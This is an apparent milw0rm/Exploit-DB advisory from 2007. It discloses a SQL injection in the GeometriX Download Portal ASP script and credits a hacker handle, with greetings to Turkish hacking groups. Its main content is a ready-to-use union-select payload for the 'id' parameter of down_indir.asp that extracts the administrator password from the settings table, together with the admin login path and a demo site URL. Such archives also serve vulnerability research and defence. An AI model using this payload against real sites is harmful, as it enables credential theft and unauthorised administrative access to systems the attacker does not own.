GeometriX Download Portal - 'down_indir.asp?id' SQL Injection

EDB-ID:

4057




Platform:

ASP

Date:

2007-06-09


#Title: GeometriX Download Portal Remote SQL Injection Vulnerability
#Author: CyberGhost
#Demo Page: http://fullaspsite.somee.com/
#Script Page: http://aspindir.com/indir.asp?id=4949&sIslem=%DDndir

#Vuln.

#Password:/down_indir.asp?id=-1+union+select+0,1,adminsifre,3,4,5,6,7+from+ayarlar
#Admin Login : /yonetim.asp
====================================
Thanx : redLine - Hackinger - excellance - Liarhack - KinSize - gsy - kerem125 - BolivaR - Joker - TaRuZ - BuTCHeR - Hacking

And All TURKISH HACKERS !

# milw0rm.com [2007-06-09]